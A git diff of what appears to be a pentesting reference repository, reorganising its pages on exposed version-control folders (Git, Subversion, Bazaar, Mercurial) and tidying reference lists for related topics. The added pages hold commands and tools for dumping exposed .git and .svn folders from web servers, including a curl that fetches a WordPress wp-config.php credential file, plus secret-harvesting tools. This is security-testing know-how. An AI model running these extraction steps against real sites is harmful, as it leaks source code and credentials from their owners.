diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index d86b2f7..cba097d 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -26,7 +26,7 @@ ## Labs -* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) +- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) ## Exploit @@ -132,13 +132,13 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon ## References -* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) -* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) -* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) -* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) -* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) -* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) -* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres) -* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors) -* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor) -* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor) \ No newline at end of file +- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) +- [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) +- [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) +- [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres) +- [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) +- [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor) +- [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors) +- [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) +- [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor) +- [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) \ No newline at end of file diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md index 2c7bb95..8f8cdf9 100644 --- a/Insecure Management Interface/README.md +++ b/Insecure Management Interface/README.md @@ -1,5 +1,12 @@ # Insecure Management Interface +## Summary + +* [Springboot-Actuator](#springboot-actuator) + * [Remote Code Execution via /env](#remote-code-execution-via-env) +* [References](#references) + + ## Springboot-Actuator Actuator endpoints let you monitor and interact with your application. @@ -88,7 +95,8 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` + ## References -* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) -* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) +- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) +- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) \ No newline at end of file diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md index c409ae8..6a8cc01 100644 --- a/Insecure Randomness/README.md +++ b/Insecure Randomness/README.md @@ -166,10 +166,10 @@ Generic identification and sandwitch attack: ## References -* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) -* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/) -* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) -* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) -* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#) -* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) -* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction) \ No newline at end of file +- [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) +- [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/) +- [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)* +- [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)* +- [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html) +- [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) +- [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction) \ No newline at end of file diff --git a/Insecure Source Code Management/Bazaar.md b/Insecure Source Code Management/Bazaar.md new file mode 100644 index 0000000..26a9aca --- /dev/null +++ b/Insecure Source Code Management/Bazaar.md @@ -0,0 +1,47 @@ +# Bazaar + +## Summary + +* [Tools](#tools) + * [rip-bzr.pl](#rip-bzrpl) + * [bzr_dumper](#bzr_dumper) +* [References](#references) + + +## Tools + +### rip-bzr.pl + +```powershell +wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl +docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u +``` + +### bzr_dumper + +```powershell +git clone https://github.com/SeahunOh/bzr_dumper +python3 dumper.py -u "http://127.0.0.1:5000/" -o source +Created a standalone tree (format: 2a) +[!] Target : http://127.0.0.1:5000/ +[+] Start. +[+] GET repository/pack-names +[+] GET README +[+] GET checkout/dirstate +[+] GET checkout/views +[+] GET branch/branch.conf +[+] GET branch/format +[+] GET branch/last-revision +[+] GET branch/tag +[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' +[*] Finish + +$ bzr revert + N application.py + N database.py + N static/ +``` + +## References + +- [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380) \ No newline at end of file diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md new file mode 100644 index 0000000..327920d --- /dev/null +++ b/Insecure Source Code Management/Git.md @@ -0,0 +1,221 @@ +# Git + +## Summary + +* [Example](#example) + * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) + * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) +* [Tools](#tools) +* [Automatic recovery](#automatic-recovery) + * [git-dumper.py](#git-dumperpy) + * [diggit.py](#diggitpy) + * [GoGitDumper](#gogitdumper) + * [rip-git](#rip-git) + * [GitHack](#githack) + * [GitTools](#gittools) +* [Harvesting secrets](#harvesting-secrets) + * [trufflehog](#trufflehog) + * [Yar](#yar) + * [Gitrob](#gitrob) + * [Gitleaks](#gitleaks) +* [Refererences] + + +## Example + +The following examples will create either a copy of the .git or a copy of the current commit. + +Check for the following files, if they exist you can extract the .git folder. + +- .git/config +- .git/HEAD +- .git/logs/HEAD + +### Recovering file contents from .git/logs/HEAD + +1. Check for 403 Forbidden or directory listing to find the `/.git/` directory +2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) + ```powershell + 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git + 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. + 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. + 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. + ``` +3. Access the commit using the hash + ```powershell + # create an empty .git repository + git init test + cd test/.git + + # download the file + wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c + + # first byte for subdirectory, remaining bytes for filename + mkdir .git/object/26 + mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ + + # display the file + git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c + tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + parent 15ca375e54f056a576905b41a417b413c57df6eb + author Michael 1489390329 +0000 + committer Michael 1489390329 +0000 + Initial. + ``` +4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + ```powershell + wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 + mkdir .git/object/32 + mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ + + git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 + 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css + 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt + 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts + 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html + 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js + ``` +5. Read the data (flag.txt) + ```powershell + wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f + mkdir .git/object/cb + mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ + git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f + ``` + +### Recovering file contents from .git/index + +Use the git index file parser https://pypi.python.org/pypi/gin (python3). + +```powershell +pip3 install gin +gin ~/git-repo/.git/index +``` + +Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. + +```powershell +$ gin .git/index | egrep -e "name|sha1" +name = AWS Amazon Bucket S3/README.md +sha1 = 862a3e58d138d6809405aa062249487bee074b98 + +name = CRLF injection/README.md +sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 +``` + +## Tools + +### Automatic recovery + +#### git-dumper.py + +```powershell +git clone https://github.com/arthaud/git-dumper +pip install -r requirements.txt +./git-dumper.py http://web.site/.git ~/website +``` + +#### diggit.py + +```powershell +git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit +./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] +./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 + +-u is remote path, where .git folder exists +-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) +-o is a hash of particular Git object to download +``` + +#### GoGitDumper + +```powershell +go get github.com/c-sto/gogitdumper +gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ +git log +git checkout +``` + +#### rip-git + +```powershell +git clone https://github.com/kost/dvcs-ripper +perl rip-git.pl -v -u "http://web.site/.git/" + +git cat-file -p 07603070376d63d911f608120eb4b5489b507692 +tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +parent 15ca375e54f056a576905b41a417b413c57df6eb +author Michael 1489389105 +0000 +committer Michael 1489389105 +0000 + +git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +``` + +#### GitHack + +```powershell +git clone https://github.com/lijiejie/GitHack +GitHack.py http://web.site/.git/ +``` + +#### GitTools + +```powershell +git clone https://github.com/internetwache/GitTools +./gitdumper.sh http://target.tld/.git/ /tmp/destdir +git checkout -- . +``` + +### Harvesting secrets + +#### trufflehog + +> Searches through git repositories for high entropy strings and secrets, digging deep into commit history. + +```powershell +pip install truffleHog # https://github.com/dxa4481/truffleHog +truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git +``` + +#### Yar + +> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. + +```powershell +go get github.com/nielsing/yar # https://github.com/nielsing/yar +yar -o orgname --both +``` + +#### Gitrob + +> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. + +```powershell +go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob +export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef +gitrob [options] target [target2] ... [targetN] +``` + +#### Gitleaks + +> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. + +```powershell +# Run gitleaks against a public repository +docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git + +# Run gitleaks against a local repository already cloned into /tmp/ +docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks + +# Run gitleaks against a specific Github Pull request +docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 + +or + +go get -u github.com/zricethezav/gitleaks +``` + + +## References + +- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/) diff --git a/Insecure Source Code Management/Mercurial.md b/Insecure Source Code Management/Mercurial.md new file mode 100644 index 0000000..5080b6b --- /dev/null +++ b/Insecure Source Code Management/Mercurial.md @@ -0,0 +1,22 @@ +# Mercurial + +## Summary + +* [Tools](#tools) + * [rip-hg.pl](#rip-hgpl) +* [References](#references) + + +## Tools + +### rip-hg.pl + +* [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG... + ```powershell + docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u + ``` + + +## References + +* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/) \ No newline at end of file diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md index cfe5cb9..a3be5d4 100644 --- a/Insecure Source Code Management/README.md +++ b/Insecure Source Code Management/README.md @@ -1,308 +1,46 @@ # Insecure Source Code Management -* [Git](#git) - * [Example](#example) - * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) - * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) - * [Tools](#tools) - * [Automatic recovery](#automatic-recovery) - * [git-dumper.py](#git-dumperpy) - * [diggit.py](#diggitpy) - * [GoGitDumper](#gogitdumper) - * [rip-git](#rip-git) - * [GitHack](#githack) - * [GitTools](#gittools) - * [Harvesting secrets](#harvesting-secrets) - * [trufflehog](#trufflehog) - * [Yar](#yar) - * [Gitrob](#gitrob) - * [Gitleaks](#gitleaks) -* [Subversion](#subversion) - * [Example (Wordpress)](#example-wordpress) - * [Tools](#tools-1) - * [svn-extractor](#svn-extractor) -* [Bazaar](#bazaar) - * [Tools](#tools-2) - * [rip-bzr.pl](#rip-bzrpl) - * [bzr_dumper](#bzr_dumper) -* [Mercurial](#mercurial) - * [Tools](#tools-3) - * [rip-hg.pl](#rip-hgpl) -* [References](#references) +Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks. -## Git -The following examples will create either a copy of the .git or a copy of the current commit. +## Summary -Check for the following files, if they exist you can extract the .git folder. +* [Bazaar](./Bazaar.md) +* [Git](./Git.md) +* [Mercurial](./Mercurial.md) +* [Subversion](./Subversion.md) +* [Methodology](#methodology) -- .git/config -- .git/HEAD -- .git/logs/HEAD -### Example +## Methodology -#### Recovering file contents from .git/logs/HEAD +Exposing the version control system folders on a web server can lead to severe security risks, including: -1. Check for 403 Forbidden or directory listing to find the `/.git/` directory -2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) - ```powershell - 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git - 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. - 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. - 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. - ``` -3. Access the commit using the hash - ```powershell - # create an empty .git repository - git init test - cd test/.git +- **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic. +- **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase. +- **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated. + - # download the file - wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c +The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques. - # first byte for subdirectory, remaining bytes for filename - mkdir .git/object/26 - mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ +* **Manual Inspection** : Check URLs manually by navigating to common SCM paths. + * http://target.com/.git/ + * http://target.com/.svn/ +* **Automated Tools** : Refer to the page related to the specific technology. - # display the file - git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c - tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - parent 15ca375e54f056a576905b41a417b413c57df6eb - author Michael 1489390329 +0000 - committer Michael 1489390329 +0000 - Initial. - ``` -4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - ```powershell - wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 - mkdir .git/object/32 - mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ +Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules. - git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 - 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css - 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt - 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts - 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html - 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js - ``` -5. Read the data (flag.txt) - ```powershell - wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f - mkdir .git/object/cb - mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ - git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f - ``` +The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint. -#### Recovering file contents from .git/index - -Use the git index file parser https://pypi.python.org/pypi/gin (python3). - -```powershell -pip3 install gin -gin ~/git-repo/.git/index +```ps1 +location /.git { + deny all; +} ``` -Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. +For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read. -```powershell -$ gin .git/index | egrep -e "name|sha1" -name = AWS Amazon Bucket S3/README.md -sha1 = 862a3e58d138d6809405aa062249487bee074b98 - -name = CRLF injection/README.md -sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 -``` - -### Tools - -#### Automatic recovery - -##### git-dumper.py - -```powershell -git clone https://github.com/arthaud/git-dumper -pip install -r requirements.txt -./git-dumper.py http://web.site/.git ~/website -``` - -##### diggit.py - -```powershell -git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit -./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] -./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 - --u is remote path, where .git folder exists --t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) --o is a hash of particular Git object to download -``` - -##### GoGitDumper - -```powershell -go get github.com/c-sto/gogitdumper -gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ -git log -git checkout -``` - -##### rip-git - -```powershell -git clone https://github.com/kost/dvcs-ripper -perl rip-git.pl -v -u "http://web.site/.git/" - -git cat-file -p 07603070376d63d911f608120eb4b5489b507692 -tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -parent 15ca375e54f056a576905b41a417b413c57df6eb -author Michael 1489389105 +0000 -committer Michael 1489389105 +0000 - -git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -``` - -##### GitHack - -```powershell -git clone https://github.com/lijiejie/GitHack -GitHack.py http://web.site/.git/ -``` - -##### GitTools - -```powershell -git clone https://github.com/internetwache/GitTools -./gitdumper.sh http://target.tld/.git/ /tmp/destdir -git checkout -- . -``` - -#### Harvesting secrets - -##### trufflehog - -> Searches through git repositories for high entropy strings and secrets, digging deep into commit history. - -```powershell -pip install truffleHog # https://github.com/dxa4481/truffleHog -truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git -``` - -##### Yar - -> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. - -```powershell -go get github.com/nielsing/yar # https://github.com/nielsing/yar -yar -o orgname --both -``` - -##### Gitrob - -> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. - -```powershell -go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob -export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef -gitrob [options] target [target2] ... [targetN] -``` - -##### Gitleaks - -> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. - -```powershell -# Run gitleaks against a public repository -docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git - -# Run gitleaks against a local repository already cloned into /tmp/ -docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks - -# Run gitleaks against a specific Github Pull request -docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 - -or - -go get -u github.com/zricethezav/gitleaks -``` - -## Subversion - -### Example (Wordpress) - -```powershell -curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base -``` - -1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db - ```powershell - INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); - ``` -2. Download interesting files - * remove \$sha1\$ prefix - * add .svn-base postfix - * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) - * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` - - -### Tools - -#### svn-extractor - -```powershell -git clone https://github.com/anantshri/svn-extractor.git -python svn-extractor.py –url "url with .svn available" -``` - -## Bazaar - -### Tools - -#### rip-bzr.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u -``` - -#### bzr_dumper - -```powershell -git clone https://github.com/SeahunOh/bzr_dumper -python3 dumper.py -u "http://127.0.0.1:5000/" -o source -Created a standalone tree (format: 2a) -[!] Target : http://127.0.0.1:5000/ -[+] Start. -[+] GET repository/pack-names -[+] GET README -[+] GET checkout/dirstate -[+] GET checkout/views -[+] GET branch/branch.conf -[+] GET branch/format -[+] GET branch/last-revision -[+] GET branch/tag -[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' -[*] Finish - -$ bzr revert - N application.py - N database.py - N static/ -``` - -## Mercurial - -### Tools - -#### rip-hg.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u -``` ## References -- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) -- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) -- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/) +- [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) \ No newline at end of file diff --git a/Insecure Source Code Management/Subversion.md b/Insecure Source Code Management/Subversion.md new file mode 100644 index 0000000..222ff63 --- /dev/null +++ b/Insecure Source Code Management/Subversion.md @@ -0,0 +1,40 @@ +# Subversion + +## Summary + +* [Examples](#examples) +* [Tools](#tools) + * [svn-extractor](#svn-extractor) +* [References](#references) + + +## Examples + +```powershell +curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base +``` + +1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db + ```powershell + INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); + ``` +2. Download interesting files + * remove \$sha1\$ prefix + * add .svn-base postfix + * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) + * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` + + +## Tools + +### svn-extractor + +* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network. + ```powershell + python svn-extractor.py --url "url with .svn available" + ``` + + +## References + +- [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/) \ No newline at end of file